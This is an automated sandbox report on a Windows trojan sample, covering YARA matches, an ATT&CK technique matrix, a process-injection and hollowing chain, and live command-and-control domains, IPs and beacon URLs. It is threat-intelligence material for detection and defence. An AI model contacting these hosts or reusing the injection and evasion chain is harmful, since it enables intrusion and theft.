Source: Yara match | File source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F18C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00F18C4F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00F1923B
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00DDF160 RtlStringFromGUID,RtlNtStatusToDosError,memcpy,RtlFreeUnicodeString,CreateFileW,GetLastError,BindIoCompletionCallback,GetLastError,CloseHandle,4_2_00DDF160
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts (2) | Native API (2) | DLL Side-Loading (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (1) | Input Capture (21) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (2) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Shared Modules (1) | Valid Accounts (2) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Input Capture (21) | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Valid Accounts (2) | Obfuscated Files or Information (3) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Clipboard Data (3) | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Access Token Manipulation (21) | DLL Side-Loading (1) | NTDS | System Information Discovery (215) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (612) | Masquerading (1) | LSA Secrets | Security Software Discovery (371) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Valid Accounts (2) | Cached Domain Credentials | Virtualization/Sandbox Evasion (13) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (13) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (21) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (612) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1579888  Sample: file.exe  Startdate: 23/12/2024  Architecture: WINDOWS  Score: 100

Start
  DNS/IP: www.vytech.net; www.ux-design-courses-53497.bond; 5 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
  • file.exe (started)
    Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    • svchost.exe (started)
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 3 other signatures
      • explorer.exe (injected)
        DNS/IP: lebahsemesta57.click 198.252.111.49 (ports 49819, 80), SOFTLAYERUS, Canada; www.vytech.net 45.38.60.47 (ports 49772, 80), EGIHOSTINGUS, United States
        Signatures: System process connects to network (likely due to code injection or exploit)
        • wlanext.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
          • explorer.exe (started)
            DNS/IP: www.7b5846.online 104.21.40.196 (ports 49885, 80), CLOUDFLARENETUS, United States
            Signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs)
          • cmd.exe (started)
            • conhost.exe (started)
        • WerFault.exe (started)
        • autoconv.exe (started)

Source | Detection | Scanner | Label | Link
file.exe | 32% | ReversingLabs | Win32.Trojan.AutoitInject |
file.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
lebahsemesta57.click | 198.252.111.49 | true | true | | unknown
www.vytech.net | 45.38.60.47 | true | true | | unknown
www.7b5846.online | 104.21.40.196 | true | true | | unknown
www.ux-design-courses-53497.bond | unknown | unknown | true | | unknown
www.imxtld.club | unknown | unknown | true | | unknown
www.lebahsemesta57.click | unknown | unknown | true | | unknown
api.msn.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://www.vytech.net/hwu6/?NvW8gh=3eE7W8JGsE0Z0gf0dkzWoMqC44Ih/LpQP6YOK8HSo/jc9NPr5lNFbiMzFCC+b/Y1vVpG&1bd=qBZpwRT8rpbTOZn | true | | unknown
                                                                                                                http://www.lf758.vipReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://wns.windows.com/Lexplorer.exe, 00000002.00000000.1669923079.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://word.office.comexplorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2759034207.0000000008C8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2755724636.0000000008C8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.cloggedpipes.net/hwu6/explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://www.rider.visionReferer:explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.04506.club/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000002.00000000.1660518211.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.6vay.boats/hwu6/www.66sodovna.netexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.stairr-lift-find.todayexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.04506.clubReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.inefity.cloud/hwu6/www.bethlark.topexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.ozzd86fih4.onlineReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.eternityzon.shopexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://schemas.micrexplorer.exe, 00000002.00000000.1667358180.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2696706638.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2842463004.000000000C85B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2809659599.000000000C857000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2819005763.000000000C85E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://outlook.comexplorer.exe, 0000000E.00000003.2759034207.0000000008C8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2755724636.0000000008C8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.apoppynote.com/hwu6/explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://www.otzen.infoexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.ux-design-courses-53497.bondexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://aka.ms/odirmPexplorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.locerin-hair.shop/hwu6/www.edmaker.onlineexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.dangdut4dselalu.pro/hwu6/www.lf758.vipexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.dental-implants-83810.bond/hwu6/explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.msn.com/en-us/news/crime/us-rep-henry-cuellar-of-texas-is-carjacked-by-three-armed-attacexplorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://www.vytech.net/hwu6/www.lebahsemesta57.clickexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://www.dental-implants-83810.bondReferer:explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://www.eternityzon.shop/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://www.inefity.cloudReferer:explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.maheshg.xyzexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000002.00000000.1660518211.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://www.imxtld.clubReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://www.ozzd86fih4.online/hwu6/www.6vay.boatsexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://outlook.com_explorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://www.vibrantsoul.xyz/hwu6/www.dangdut4dselalu.proexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://www.msn.com/en-us/news/us/texas-congressman-is-victim-of-carjacking-in-washington-d-c/ar-AA1explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://www.otzen.infoReferer:explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
IP             | Domain               | Country       | ASN   | ASN Name        | Malicious
45.38.60.47    | www.vytech.net       | United States | 18779 | EGIHOSTINGUS    | true
104.21.40.196  | www.7b5846.online    | United States | 13335 | CLOUDFLARENETUS | true
198.252.111.49 | lebahsemesta57.click | Canada        | 36351 | SOFTLAYERUS     | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579888
Start date and time: 2024-12-23 13:56:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@12/11@6/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 60
• Number of non-executed functions: 290
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe, TextInputHost.exe, StartMenuExperienceHost.exe, mobsync.exe
• Excluded IPs from analysis (whitelisted): 131.253.33.203, 2.16.158.179, 2.16.158.170, 2.16.158.169, 2.16.158.185, 2.16.158.96, 2.16.158.171, 2.16.158.90, 2.16.158.91, 2.16.158.176, 20.12.23.50, 13.107.246.63, 20.190.147.12, 23.218.208.109, 2.16.158.33
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, a-0003.dc-msedge.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, icePrime.a-0003.dc-msedge.net, r.bing.com, api-msn-com.a-0003.a-msedge.net
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: file.exe
Time     | Type            | Description
07:57:00 | API Interceptor | 920415x Sleep call for process: explorer.exe modified
07:57:40 | API Interceptor | 1872836x Sleep call for process: wlanext.exe modified
Match         | Associated Sample Name / URL | Detection | Threat Name
104.21.40.196 | file.exe                     | malicious | ManusCrypt
              | fJe9em23BB.exe               | malicious | Fabookie, ManusCrypt, Nymaim, PrivateLoader, Raccoon Stealer v2, RedLine
              | BLAoQPacf8.exe               | malicious | Clipboard Hijacker, ManusCrypt, Nymaim, PrivateLoader, Raccoon Stealer v2, RedLine
              | file.exe                     | malicious | ManusCrypt
              | file.exe                     | malicious | Djvu, Fabookie, ManusCrypt, SmokeLoader
              | file.exe                     | malicious | Djvu, Fabookie, ManusCrypt, RedLine, SmokeLoader
              | file.exe                     | malicious | Djvu, Fabookie, SmokeLoader
              | file.exe                     | malicious | Djvu, Fabookie, ManusCrypt, SmokeLoader
              | file.exe                     | malicious | SmokeLoader
              | file.exe                     | malicious | Djvu, ManusCrypt, PrivateLoader, SmokeLoader, Socelars
                                                                                                                                                                                                                                                    No context
Match        | Associated Sample Name / URL | Detection | Threat Name   | Context
EGIHOSTINGUS | nshmips.elf                  | malicious | Mirai         | 107.164.204.39
             | arm.elf                      | malicious | Mirai         | 107.164.205.148
             | la.bot.sparc.elf             | malicious | Mirai         | 142.253.14.168
             | hmips.elf                    | malicious | Mirai         | 23.27.237.204
             | arm.elf                      | malicious | Mirai, Moobot | 142.253.14.140
             | powerpc.nn.elf               | malicious | Mirai, Okiru  | 107.186.122.115
             | loligang.arm7.elf            | malicious | Mirai         | 205.166.25.210
             | x86_64.nn.elf                | malicious | Mirai, Okiru  | 23.27.206.168
             | x86.elf                      | malicious | Mirai         | 104.253.182.82
             | x86.elf                      | malicious | Unknown       | 172.120.223.194
SOFTLAYERUS  | armv7l.elf                   | malicious | Unknown       | 74.55.127.17
             | armv4l.elf                   | malicious | Unknown       | 149.81.196.88
             | loligang.ppc.elf             | malicious | Mirai         |
                                                                                                                                                                                                                                                    • 169.49.98.24
                                                                                                                                                                                                                                                    nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 161.158.243.33
                                                                                                                                                                                                                                                    spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                    • 161.203.103.182
                                                                                                                                                                                                                                                    nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 207.218.215.172
                                                                                                                                                                                                                                                    nshmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 169.62.101.145
                                                                                                                                                                                                                                                    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                    • 169.48.138.43
                                                                                                                                                                                                                                                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                    • 158.85.204.111
                                                                                                                                                                                                                                                    arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                    • 169.53.22.157
                                                                                                                                                                                                                                                    CLOUDFLARENETUShttps://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.18.16.155
                                                                                                                                                                                                                                                    https://laimilano.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.22.164
                                                                                                                                                                                                                                                    Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                                                                                                    acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.35.89
                                                                                                                                                                                                                                                    rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                                                                                                    https://www.google.com.au/url?q=//www.google.co.nz/amp/s/synthchromal.ru/Vc51/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.154.63
                                                                                                                                                                                                                                                    https://a41c415c7bccad129d61b50d2032009e.aktive-senioren.biz/de/st/1?#bqcnl4tocgzq65tck3bvGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.92.223
                                                                                                                                                                                                                                                    FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.150.173
